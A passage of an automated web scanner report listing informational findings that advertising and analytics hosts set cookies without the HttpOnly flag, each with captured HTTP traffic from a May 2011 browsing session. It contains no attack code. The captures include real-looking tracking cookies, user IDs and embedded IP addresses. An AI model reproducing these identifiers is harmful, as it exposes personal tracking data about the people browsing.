P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25690

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
10.33. http://atd.agencytradingdesk.net/WatsonTracker/IMP/A1000138/C1000187/P1003016/pixel.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atd.agencytradingdesk.net
Path:   /WatsonTracker/IMP/A1000138/C1000187/P1003016/pixel.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /WatsonTracker/IMP/A1000138/C1000187/P1003016/pixel.gif?address=http%3A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages&ref=&r=0.7856057139579207&TS=b2d804d6-adca-49fb-b367-cbdf1f8909e9&err= HTTP/1.1
Host: atd.agencytradingdesk.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:47 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: V=LsbDqh7rwFQu; expires=Wed, 09-May-2012 14:00:47 GMT; path=/
Set-Cookie: atd_event4=1000138|1000187|1003016||16|-1|-1|WI|5/9/2011 10:00:47 AM|6/8/2011 10:00:47 AM; expires=Wed, 08-Jun-2011 14:00:47 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: image/GIF
Content-Length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

GIF89a.............!.......,........@..D.;
10.34. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=2102&rn=699931416&c7=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&c3=16&c4=0&c5=0&c15=541%252C1697%252C2354%252C2532%252C1443%252C2250&c16=LIFL1.FCRT1.ZETC1.AMQU2.NETM7.EXPD1&c8=Highly%20publicized%20murder%20of%20Caylee%20Anthony%20rivets%2C&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 09 May 2011 14:00:03 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 08-May-2013 14:00:03 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

10.35. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6036462&d.c=gif&d.o=tribglobal&d.x=64109300&d.t=page&d.u=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 09 May 2011 13:59:57 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 08-May-2013 13:59:57 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;
10.36. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p97174789&c3=256163696&c4=206438267&c5=1&c6=39&c7=sun%20apr%2024%2012%3A09%3A48%202011&c8=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&c9=&c10=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&c15=&1304949586804 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; UID=875e3f1e-184.84.247.65-1303349046; ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:45 2011&prad=256163696&arc=206438267&; BMX_G=method->-1,ts->1304949585; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 09 May 2011 13:59:48 GMT
Connection: close
Set-Cookie: UID=875e3f1e-184.84.247.65-1303349046; expires=Wed, 08-May-2013 13:59:48 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

10.37. http://bandcamp.com/EmbeddedPlayer/album=1841946683/size=short/bgcol=FFFFFF/linkcol=4285BB//  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bandcamp.com
Path:   /EmbeddedPlayer/album=1841946683/size=short/bgcol=FFFFFF/linkcol=4285BB//

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /EmbeddedPlayer/album=1841946683/size=short/bgcol=FFFFFF/linkcol=4285BB// HTTP/1.1
Host: bandcamp.com
Proxy-Connection: keep-alive
Referer: http://asthmatickitty.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 303 See Other
Date: Mon, 09 May 2011 14:07:25 GMT
Location: http://bandcamp.com/tmpdata/cache/EmbeddedPlayer_d0e6d1752b89d4a0af444714f9fb047f.swf?size=short&album=1841946683&ref=http%3A%2F%2Fasthmatickitty.com%2F&linkcol=4285BB&bgcol=FFFFFF
Content-Type: text/html
Via: 1.1 bandcamp.com
Vary: Accept-Encoding
Set-Cookie: client_id=B19E03FF5E8534E71DA55EB294CAD1653B3E3289; domain=.bandcamp.com; path=/; expires=Sun, 09-May-2021 14:07:25 GMT
Connection: Keep-alive
Content-Length: 430

You are being redirected, please follow <a href="http://bandcamp.com/tmpdata/cache/EmbeddedPlayer_d0e6d1752b89d4a0af444714f9fb047f.swf?size=short&album=1841946683&ref=http%3A%2F%2Fasthmatickitty.com%2
...[SNIP]...
10.38. http://bandcamp.com/EmbeddedPlayer/v=2/album=3451972295/size=grande/bgcol=FFFFFF/linkcol=4285BB/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bandcamp.com
Path:   /EmbeddedPlayer/v=2/album=3451972295/size=grande/bgcol=FFFFFF/linkcol=4285BB/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /EmbeddedPlayer/v=2/album=3451972295/size=grande/bgcol=FFFFFF/linkcol=4285BB/ HTTP/1.1
Host: bandcamp.com
Proxy-Connection: keep-alive
Referer: http://asthmatickitty.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:24 GMT
Content-Type: text/html
Via: 1.1 bandcamp.com
Vary: Accept-Encoding
Set-Cookie: client_id=2B50BEA79340BB1834AEF772993EEECA0D04FB1A; domain=.bandcamp.com; path=/; expires=Sun, 09-May-2021 14:07:24 GMT
Connection: Keep-alive
Content-Length: 9768

<!DOCTYPE HTML>
<html>
<head>
<meta name="apple-mobile-web-app-capable" content="yes" />


<script type="text/javascript" src="http://bandcamp.com/tmpdata/cache/yahoo-dom-event_8c9671
...[SNIP]...
10.39. http://bandcamp.com/EmbeddedPlayer/v=2/album=3451972295/size=short/bgcol=FFFFFF/linkcol=4285BB/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bandcamp.com
Path:   /EmbeddedPlayer/v=2/album=3451972295/size=short/bgcol=FFFFFF/linkcol=4285BB/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /EmbeddedPlayer/v=2/album=3451972295/size=short/bgcol=FFFFFF/linkcol=4285BB/ HTTP/1.1
Host: bandcamp.com
Proxy-Connection: keep-alive
Referer: http://asthmatickitty.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:24 GMT
Content-Type: text/html
Via: 1.1 bandcamp.com
Vary: Accept-Encoding
Set-Cookie: client_id=EB1D824AEDC2708913CE8C9801E9305201D6C6F9; domain=.bandcamp.com; path=/; expires=Sun, 09-May-2021 14:07:24 GMT
Connection: Keep-alive
Content-Length: 8445

<!DOCTYPE HTML>
<html>
<head>
<meta name="apple-mobile-web-app-capable" content="yes" />


<script type="text/javascript" src="http://bandcamp.com/tmpdata/cache/yahoo-dom-event_8c9671
...[SNIP]...
10.40. http://bh.contextweb.com/bh/rtset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=530739&ev=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1; cw=cw; 536156_4_101378=1304949601925; vf=1

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web83
Cache-Control: no-cache, no-store
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Thu, 03-May-2012 14:00:04 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; Domain=.contextweb.com; Expires=Tue, 08-May-2012 14:00:04 GMT; Path=/
Content-Type: image/gif
Date: Mon, 09 May 2011 14:00:04 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;
10.41. http://bid.openx.net/json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /json?c=OXM_27583348075&pid=dd81ea27-d6ee-482c-a1ae-66747444994b&s=468x60&f=0.6&cid=oxpv1%3A72-1331-4020-944-2650&hrid=02eea6ce6a94fccf845961f4c7a8855c-1304949600&url=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://www.surphace.com/ads/rubicon_orlandosentinel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=02dd71c0-6aac-4019-82e3-049e51d96c25; p=1304805364

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=c440f793-2063-4ac9-9371-1aa8ec559ee1; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1304949602; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_27583348075({"r":null});
10.42. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2393594&PluID=0&w=300&h=250&ord=949833763&ucm=true&ncu=$$http://adserver.adtech.de/adlink|577|2951880|0|170|AdId=6233986;BnId=1;itime=949833763;key=key1+key2+key3+key4;nodecode=yes;link=$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/user/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f; C4=; u2=eabf95f8-0142-429e-b9ac-2012a75d64353HU0ag; A3=jlP8aJjE0dpH00001jAsGaJH702WG00003jBofaIOs07Si00001; B3=8Whx0000000003uu9wtb0000000001ur9oDg0000000001ut

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jlP8aJjE0dpH00001juYgaL6v07Kl00001jBofaIOs07Si00001jAsGaJH602WG00003; expires=Sun, 07-Aug-2011 10:07:18 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9wtb0000000001ur8Whx0000000003uu9oDg0000000001ut98nW0000000001uy; expires=Sun, 07-Aug-2011 10:07:18 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 09 May 2011 14:07:17 GMT
Connection: close
Content-Length: 2128

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
10.43. http://cf.addthis.com/red/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=0&gen=1000&gen=100&sid=4dc7f39843ecbee9&callback=_ate.ad.hrr&pub=irishtimes&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.irishtimes.com%2Fnewspaper%2Ftheticket%2F2011%2F0506%2F1224296203710.html&1syp1cb HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=1304471550.60|1304471550.1OD|1304471550.1FE; dt=X; psc=4; uid=4dab4fa85facd099; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Mon, 09 May 2011 14:04:52 GMT
Set-Cookie: di=1304471550.1FE|1304471550.1OD|1304471550.60; Domain=.addthis.com; Expires=Wed, 08-May-2013 14:04:52 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 08-Jun-2011 14:04:52 GMT; Path=/
Content-Type: text/javascript
Content-Length: 161
Date: Mon, 09 May 2011 14:04:51 GMT
Connection: close

_ate.ad.hrr({"urls":["http://p.addthis.com/pixel?pixelID=57148&partnerID=115&key=segment"],"segments":["1NE"],"loc":"MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NDAwVg=="});
10.44. http://content.pulse360.com/cgi-bin/context.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.pulse360.com
Path:   /cgi-bin/context.cgi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/context.cgi?id=91041742&ganid=floridatoday&gans=news&ganss=&format=bare&ganst=&title=1&signup=1 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:28 GMT
Server: Barista/1.1
Connection: Keep-Alive
Content-Type: text/html
set-cookie: vi_1.021=130494962871114765000106049048049; domain=.pulse360.com; path=/; expires=Tue, 08-May-2012 14:00:28 GMT
set-cookie: fc_1.2=AXzzx00; domain=.pulse360.com; path=/; expires=Mon, 16-May-2011 14:00:28 GMT
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Length: 3662

document.write('<style type="text/css">.p360_listing { cursor: pointer;}</style><!--Ad Markup by Seevast--><div id="p360_ad_unit"><div id="p360_header"><div class="p360_aligner_left"><span id="p360_
...[SNIP]...
10.45. http://contextweb-match.dotomi.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://contextweb-match.dotomi.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: contextweb-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 204 No Content
Date: Mon, 09 May 2011 14:00:07 GMT
X-Name: rtb-s02
Set-Cookie: Apache=173.193.214.243.1304949607632986; path=/
Cache-Control: max-age=0, no-store
Content-Length: 0
Connection: close
Content-Type: text/plain

10.46. http://core.insightexpressai.com/adServer/adServerESI.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/adServerESI.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adServer/adServerESI.aspx?bannerID=178140&script=false&redir=http://core.insightexpressai.com/adserver/1pixel.gif HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=gannett%3Afloridatoday
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074; IXAIBanners2554=175183; IXAIBannerCounter175183=1; IXAIControlCounter2554=1; lastInvite=4%2f23%2f2011+4%3a30%3a01+PM; IXAIinvited2554=true; IXAIBannerCounter174602=1; IXAIFirstHit2460=4%2f23%2f2011+4%3a31%3a40+PM; IXAIBanners2460=174602,174595; IXAIBannerCounter174595=1; IXAILastHit2460=5%2f2%2f2011+2%3a16%3a33+PM; IXAICampaignCounter2460=2; IXAIBanners2579=178140; IXAIBannerCounter178140=1; IXAIFirstHit2579=5%2f2%2f2011+1%3a51%3a33+PM; IXAILastHit2579=5%2f2%2f2011+1%3a51%3a33+PM; IXAICampaignCounter2579=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/7.0
Content-Length: 153
Content-Type: text/html
Location: http://core.insightexpressai.com/adserver/1pixel.gif
Set-Cookie: IXAIBanners2579=178140,178140; domain=.insightexpressai.com; expires=Mon, 09-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAIBannerCounter178140=2; domain=.insightexpressai.com; expires=Mon, 09-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAILastHit2579=5%2f9%2f2011+9%3a51%3a44+AM; domain=.insightexpressai.com; expires=Mon, 09-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAICampaignCounter2579=2; domain=.insightexpressai.com; expires=Mon, 09-May-2016 12:00:00 GMT; path=/
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Vary: Accept-Encoding
Expires: Mon, 09 May 2011 14:00:53 GMT
Pragma: no-cache
Date: Mon, 09 May 2011 14:00:53 GMT
Connection: close
Cache-Control: no-store

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>
10.47. http://cspix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

